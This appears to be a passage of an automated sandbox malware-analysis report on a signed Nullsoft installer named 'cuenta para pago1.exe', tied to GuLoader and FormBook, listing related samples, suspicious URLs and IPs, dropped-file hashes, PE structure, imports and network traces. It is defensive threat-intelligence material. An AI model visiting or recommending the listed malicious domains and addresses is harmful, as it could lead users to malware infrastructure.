                                                                  • www.taifengtechnologyservice.com/ns03/?DTdTP=hQJO7rrVsFaND9VxqIhBPO08Nab7fckuKdqBNrIsCWjHF6Cj2JZqMVNmSPc5hKHUY9ZD&jhIpS=Vhct
                                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                  • www.taketechai.com/cgf3/
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.teenpattimasterapp.org/v3ka/?1T=si7FLVHJ8iWuYVaJX0viNMh14aSy8OUSJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfJJOmXY/Qje/FgRXyNk=&Tnn=Sxv4
                                                                  Ckswuxhusyynxl.exe.Direct download.exeGet hashmaliciousDeal Ply, DBatLoader, FormBookBrowse
                                                                  • www.xn--bb55rtp-9va2p.store/3rwr/
                                                                  PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.cityrentsatruck.com/e25x/
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.teenpattimasterapp.org/v3ka/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  parkingpage.namecheap.comGrundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                  • 91.195.240.19
                                                                  CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                  • 91.195.240.19
                                                                  9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 91.195.240.19
                                                                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                  • 91.195.240.19
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 91.195.240.19
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  PI for #13288.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 91.195.240.19
                                                                  www.stellerechoes.xyzrcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura-022899.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Recibo de transferenc#U00eda.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
Match: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll
Associated samples:
• Filename: comprobante de transferencia.exe, Detection: malicious, Threat Name: GuLoader
• Filename: Grundforbedre39.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Filename: comprobante de transferencia.exe, Detection: malicious, Threat Name: GuLoader
• Filename: Grundforbedre39.exe, Detection: malicious, Threat Name: GuLoader
• Filename: venerationens.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Filename: venerationens.exe, Detection: malicious, Threat Name: GuLoader
• Filename: Interviewed.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Filename: Interviewed.exe, Detection: malicious, Threat Name: GuLoader
• Filename: Arborean.exe, Detection: malicious, Threat Name: FormBook, GuLoader
                                                                                    Process:C:\Windows\SysWOW64\rasautou.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):188416
                                                                                    Entropy (8bit):0.9926780404836638
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                                    MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                                    SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                                    SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                                    SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.656126712214018
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                                    MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                                    SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                                    SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                                    SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
• Filename: comprobante de transferencia.exe, Detection: malicious
• Filename: Grundforbedre39.exe, Detection: malicious
• Filename: comprobante de transferencia.exe, Detection: malicious
• Filename: Grundforbedre39.exe, Detection: malicious
• Filename: venerationens.exe, Detection: malicious
• Filename: venerationens.exe, Detection: malicious
• Filename: Interviewed.exe, Detection: malicious
• Filename: Interviewed.exe, Detection: malicious
• Filename: Arborean.exe, Detection: malicious
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):274661
                                                                                    Entropy (8bit):3.2513826448357057
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:VLYngh97JDNV3fLhV/OKJCY2kKIwk7Xf7NTVaYYvPclKkL:5Y6Dnj7JCkK/ovBT89cII
                                                                                    MD5:9CB88B1AE7827818B29E20B15C82A937
                                                                                    SHA1:A60DFA07CBF65C96A3C7019D99452F138A12746E
                                                                                    SHA-256:445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
                                                                                    SHA-512:2D0B4879369B2ADF0136AA2CDB1299614311A16D76F2A4FB90521E5D2EA17153874DA1F40C25A0CEBEDBE18DD31C2102AA0B6FAF295F1838FB3798CACA3EF1BE
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):200432
                                                                                    Entropy (8bit):3.234993383739913
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:MbK3xS/itsupP4zlLPatE1650lNzpANsqud:x2K16zJa2Qwd
                                                                                    MD5:910B94BB45EC253A90F4CA8FA56BC584
                                                                                    SHA1:ED29E140FE94207B697953B8D1466F7C02F4E60E
                                                                                    SHA-256:BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
                                                                                    SHA-512:93C902D3EC6959BBFA801D13A787A157A998B3615E69EFA205D0952FA6A9935AB699E62316A20F5DB0682DA340FAC8B8454272DDFE9C82D7C16CF57FBB6EE1A0
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):140830
                                                                                    Entropy (8bit):4.592740302073615
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:D5m2W/j6XGNGBEwd8hHB/cTSkC3qH5id1jGk:E2h2iOkT8aEjh
                                                                                    MD5:0AA47FD86AD62B9DED911F927E5AA454
                                                                                    SHA1:D3F9EE25803FFB0736EB9BCA9AB96DEB211F2F29
                                                                                    SHA-256:DE0776B8B0B30E7CC76DB135BA55343E6E98CECC53B95BAFCD1A463B0BA8E00B
                                                                                    SHA-512:A91C7D984BC2B446C945CD445BE724D35B98C6F5DE7E5D3CBA43ED16D4B43ABDCF44FEFBD5F2B21BEF3E68875F79911CA364966FEC199208FB845D7D046C6B12
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):232566
                                                                                    Entropy (8bit):7.8350723226470045
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:VkVJJXyerr8g6/1t/1++V7gLDaKXmv2FrNJCfYV/77PvgIdx1il9BHDyl/+n:CVCmre9dHFKXmeVvCYVXAKk3Bjyq
                                                                                    MD5:94F9D794B89C4C3A5CDBFA0E544C3ED2
                                                                                    SHA1:97AF9B3577CA9BEAC5C3D67668F1CD9D7CC21DA0
                                                                                    SHA-256:E339E88007B243D5C0F7A655B959AE78B38F899A97AAE53D6807255B948E0879
                                                                                    SHA-512:8515782F6C84B8748AFA2C31E9B61BC829917BE50A41370296C46505A6B9B2531CEF87515DF741179249C1EC96E7A8BD765CB53D2582BBE43F730F0259F2D9F8
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):272352
                                                                                    Entropy (8bit):3.2380792387673005
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9wrIYjPjPwOv1ccOX2vCXCdj4w8JJ3WkPd+Eix/j8lQ1KpB:9lYjTwOdccNCup8JJLP8EiF8lB
                                                                                    MD5:93A04CCDF51474B877C9414AE5AD2760
                                                                                    SHA1:1321C10A4CC69A33235C87ABF2779A57619533BB
                                                                                    SHA-256:D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
                                                                                    SHA-512:675C752DEDAD08A6BBBB976A3E26F03D54B1AF4DDA84999B7749D8DB67BA01E1488CC92AFB5C769A5B4BE3DD67B6AC0038D9062CD8DDEB025E9493241038DB2D
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):207086
                                                                                    Entropy (8bit):3.2412864519720883
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:/xOtUWnnPV6AtPH2oDGzK6jQoplsYXzYl:/xvE6Afw5jQoplLYl
                                                                                    MD5:1171715CBB2206BFF607138FEF73877F
                                                                                    SHA1:D7059E4A741A345239A17FE037C8605D4219E28C
                                                                                    SHA-256:27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
                                                                                    SHA-512:69449053EAD94E7B0894729E3608F767D8E53775300F876EEC04712C653580EFCEE192BB64EE4A5D10A3B4648351DD0DCB4661F8EB62199BC92B661967ABDB4E
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):183776
                                                                                    Entropy (8bit):3.2465393215116713
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:0Y0pp0QgB1Uepc+D+FJOHDz9WWhEGwk/oZP:0Y0piQgB1Uepc+6Q5h7T/+
                                                                                    MD5:B013C10185F365E645B1A8A4090DE5AF
                                                                                    SHA1:20F0178AD225AEC8785EA741E82729E6D816CEF0
                                                                                    SHA-256:0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C
                                                                                    SHA-512:B33FDB0357DA26C5E4A6BB45B50FDEAFE102E428F56D90A5EAC57829F5F57F8323C689A2BE928A468DB46948012078D10B605AE03F246EAA72827B1351807412
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):453
                                                                                    Entropy (8bit):4.317248216463251
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pUVo0WmtKoENHeo6fAy/22Xe7V9Ec/BZMIjbAl4WOE:KjKb9Vyul59JXehn
                                                                                    MD5:9F716DE9908957BD324DCC4ADA5A33F7
                                                                                    SHA1:5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD
                                                                                    SHA-256:CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
                                                                                    SHA-512:0C47E325FD292F1E782B69F985A92336D1F0DF39E8C0902389F81BB6E7CE212968EF6EA9ABCBE2C8B9869021A9095B868E93AF51EBF8085596FCC5B05E35F237
                                                                                    Malicious:false
                                                                                    Preview:reaudition bancal scalelike boligaktivister uninstructedness..tankers befragternes unfoggy snowmaker ectrodactylia leachier..gopherman ultrarapidt ichthyosis repine leniencies mistreading..supergravitated indlemning rhinoceroses hjaelpelaerere dizzies spndkraft kopskifte reenlargement backtack tylosoid..brevpakkernes foderautomaten supersarcasm lystrede whiteheart teratogenous.fetology uneddied archprimate pilotprojekters slovakish pseudoassertive..
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.98667284386465
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:cuenta para pago1.exe
                                                                                    File size:826'296 bytes
                                                                                    MD5:93d1942c204022e792af256d0ccbe8e5
                                                                                    SHA1:76649fb41dc760d4c9ad8be23e239fcb7b0e2418
                                                                                    SHA256:c44904bfb8b44d8071f33359f824028597145f76bd1a6baf86d91679215e3c7d
                                                                                    SHA512:84847cec402e63e88681b9d9ea4473790cefa39c0ab500b895ca0ea4ca89d4c756a3c99fc03cd8737a06b9393a6f592994674f25e1402700eab85919197047e1
                                                                                    SSDEEP:12288:7qL1BIckrqvvW+ziaB/5FsfecWGClPW3ObwMB8aqEEbViGCyQRy1/6dzgA6zZxfV:A8ckmHN5Fo+GClPgBoZyQqNbbfNP
                                                                                    TLSH:3405230253534061F8E2C8B149B5E3A2D438BAD8D329D60E6B7425B9765FF62CE2533F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@
                                                                                    Icon Hash:3d2e0f95332b3399
                                                                                    Entrypoint:0x40326a
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:E=Pereirine@Pentametrist.an, O=Solacers, OU="Svenskekysts Avicolous ", CN=Solacers, L=Bierville, S=Normandie, C=FR
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 08/06/2023 01:41:04 07/06/2026 01:41:04
                                                                                    Subject Chain
                                                                                    • E=Pereirine@Pentametrist.an, O=Solacers, OU="Svenskekysts Avicolous ", CN=Solacers, L=Bierville, S=Normandie, C=FR
                                                                                    Version:3
                                                                                    Thumbprint MD5:2EC7E8275C20559E88C538C96D7D0E67
                                                                                    Thumbprint SHA-1:281A679C7E193E694322E17A51E1FC2D31F1AC63
                                                                                    Thumbprint SHA-256:85FB8EFD8690E8B768C88F9ACF3CBF799ABB9D9F3DCDAA65E4BF9CBD935AB2DA
                                                                                    Serial:60380FD1D1389917E43B142D7968F4113B427534
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 004092E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004070B0h]
                                                                                    call dword ptr [004070ACh]
                                                                                    cmp ax, 00000006h
                                                                                    je 00007F1394BF6AB3h
                                                                                    push ebx
                                                                                    call 00007F1394BF9BF4h
                                                                                    cmp eax, ebx
                                                                                    je 00007F1394BF6AA9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004072B8h
                                                                                    push esi
                                                                                    call 00007F1394BF9B6Eh
                                                                                    push esi
                                                                                    call dword ptr [0040715Ch]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007F1394BF6A8Ch
                                                                                    push ebp
                                                                                    push 00000009h
                                                                                    call 00007F1394BF9BC6h
                                                                                    push 00000007h
                                                                                    call 00007F1394BF9BBFh
                                                                                    mov dword ptr [00429204h], eax
                                                                                    call dword ptr [0040703Ch]
                                                                                    push ebx
                                                                                    call dword ptr [004072A4h]
                                                                                    mov dword ptr [004292B8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 004206A8h
                                                                                    call dword ptr [00407188h]
                                                                                    push 004092C8h
                                                                                    push 00428200h
                                                                                    call 00007F1394BF97A8h
                                                                                    call dword ptr [004070A8h]
                                                                                    mov ebp, 00434000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F1394BF9796h
                                                                                    push ebx
                                                                                    call dword ptr [00407174h]
                                                                                    add word ptr [eax], 0000h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7504 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x67000 | 0xb48 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc80d8 | 0x1ae0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x5ff9 | 0x6000 | 34f0469eb860d5ecf0e52ef9d3820a60 | False | 0.6667073567708334 | data | 6.4734859396670705 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x13a4 | 0x1400 | 848ecd58951d0a4cfe8ec8cfce6b20d1 | False | 0.452734375 | data | 5.125569346027248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9000 | 0x202f8 | 0x600 | 3953dbb7217e7539ee75e90871f7aef9 | False | 0.4947916666666667 | data | 3.9050018847265378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x2a000 | 0x3d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x67000 | 0xb48 | 0xc00 | 737bf22e330f1bb677a1a75bfb3076c2 | False | 0.4215494791666667 | data | 4.359435247089545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0x671c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894 |
| RT_DIALOG | 0x674a8 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x675a8 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x676c8 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x67790 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x677f0 | 0x14 | data | English | United States | 1.2 |
| RT_MANIFEST | 0x67808 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153 |
| DLL | Import |
| --- | --- |
| KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
| USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                    Mar 18, 2024 15:06:52.604727030 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.604734898 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.604959965 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.606785059 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.607093096 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.607100010 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.607248068 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.609292984 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.609484911 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.609496117 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.609671116 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.611639023 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.611813068 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.611823082 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.612071991 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.614056110 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.614291906 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.614303112 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.614557981 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.616498947 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.616744995 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.616755962 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.616939068 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.618788958 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.618988991 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.618999958 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.619298935 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.621061087 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.621263981 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.621274948 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.621458054 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.623213053 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.623373032 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.623384953 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.623625994 CET49804443192.168.11.30142.251.41.1
